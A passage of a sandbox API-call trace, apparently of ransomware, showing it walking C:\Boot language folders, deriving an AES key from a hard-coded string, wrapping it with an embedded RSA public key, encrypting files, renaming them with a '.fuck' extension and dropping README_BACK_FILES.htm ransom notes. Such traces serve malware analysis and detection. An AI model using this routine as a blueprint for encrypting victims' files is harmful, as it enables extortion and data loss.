(lpExistingFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.313] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.313] DeleteFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg")) returned 1 [0140.315] MoveFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.fuck")) returned 0 [0140.315] CryptDestroyHash (hHash=0x27fef98) returned 1 [0140.315] CryptDestroyKey (hKey=0x27ff358) returned 1 [0140.315] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.315] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.315] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0140.321] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ru-ru\\readme_back_files.htm")) returned 0xffffffff [0140.321] AreFileApisANSI () returned 1 [0140.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.321] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ru-ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.323] GetFileType (hFile=0x5d50) returned 0x1 [0140.323] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.324] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.324] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sk-SK\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0140.325] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.325] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.325] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.325] GetLastError () returned 0x0 [0140.325] GetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui")) returned 0x20 [0140.325] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.325] CreateFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.326] CreateFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.326] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.327] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.329] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.329] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.329] CryptHashData (hHash=0x27ff358, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.329] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.329] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.329] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.330] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2805538) returned 1 [0140.330] CryptImportPublicKeyInfo (in: hCryptProv=0x2805538, dwCertEncodingType=0x1, pInfo=0x2800240*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800270*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800278*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fef98) returned 1 [0140.330] CryptEncrypt (in: hKey=0x27fef98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.330] CryptEncrypt (in: hKey=0x27fef98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804900*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804900*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.330] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804900*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.331] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.331] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.331] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.332] CloseHandle (hObject=0xffffffff) returned 1 [0140.332] CloseHandle (hObject=0x5d54) returned 1 [0140.335] CopyFileA (lpExistingFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.340] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.340] DeleteFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg")) returned 1 [0140.341] MoveFileA (lpExistingFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.fuck")) returned 0 [0140.342] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.342] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.342] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.342] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.342] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.342] GetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sk-sk\\readme_back_files.htm")) returned 0xffffffff [0140.342] AreFileApisANSI () returned 1 [0140.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d590, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.342] CreateFileW (lpFileName="C:\\\\Boot\\sk-SK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sk-sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.343] GetFileType (hFile=0x5d50) returned 0x1 [0140.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.344] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.344] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sl-SI\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0140.345] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.345] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.345] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.345] GetLastError () returned 0x0 [0140.345] GetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui")) returned 0x20 [0140.345] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.345] CreateFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.346] CreateFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.346] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.347] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.349] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.349] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.349] CryptHashData (hHash=0x27ff358, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.349] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.349] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.349] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.349] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804fe8) returned 1 [0140.350] CryptImportPublicKeyInfo (in: hCryptProv=0x2804fe8, dwCertEncodingType=0x1, pInfo=0x2800310*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800340*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800348*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27feb58) returned 1 [0140.350] CryptEncrypt (in: hKey=0x27feb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.350] CryptEncrypt (in: hKey=0x27feb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28055c0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28055c0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.350] WriteFile (in: hFile=0x5d54, lpBuffer=0x28055c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28055c0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.352] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.352] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.352] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.352] CloseHandle (hObject=0xffffffff) returned 1 [0140.352] CloseHandle (hObject=0x5d54) returned 1 [0140.353] CopyFileA (lpExistingFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.358] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.358] DeleteFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg")) returned 1 [0140.359] MoveFileA (lpExistingFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.fuck")) returned 0 [0140.359] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.359] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.359] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.359] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.359] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.359] GetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sl-si\\readme_back_files.htm")) returned 0xffffffff [0140.383] AreFileApisANSI () returned 1 [0140.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d6a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.383] CreateFileW (lpFileName="C:\\\\Boot\\sl-SI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sl-si\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.385] GetFileType (hFile=0x5d50) returned 0x1 [0140.385] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.407] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.407] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sr-Latn-CS\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0140.407] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.407] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.407] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.408] GetLastError () returned 0x0 [0140.408] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui")) returned 0x20 [0140.408] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.408] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.408] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.413] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.414] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.416] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.416] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.416] CryptHashData (hHash=0x27ff5d8, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.416] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff5d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff218) returned 1 [0140.416] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.416] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.416] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804e50) returned 1 [0140.417] CryptImportPublicKeyInfo (in: hCryptProv=0x2804e50, dwCertEncodingType=0x1, pInfo=0x28007f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800820*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800828*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fe6d8) returned 1 [0140.417] CryptEncrypt (in: hKey=0x27fe6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.417] CryptEncrypt (in: hKey=0x27fe6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28047f0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28047f0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.417] WriteFile (in: hFile=0x5d54, lpBuffer=0x28047f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28047f0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.418] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.418] CryptEncrypt (in: hKey=0x27ff218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.418] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.418] CloseHandle (hObject=0xffffffff) returned 1 [0140.418] CloseHandle (hObject=0x5d54) returned 1 [0140.419] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.439] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.440] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg")) returned 1 [0140.441] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.fuck")) returned 0 [0140.442] CryptDestroyHash (hHash=0x27ff5d8) returned 1 [0140.442] CryptDestroyKey (hKey=0x27ff218) returned 1 [0140.442] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.442] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.442] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.442] GetLastError () returned 0x5 [0140.442] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui")) returned 0x20 [0140.443] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.443] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.443] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg"), 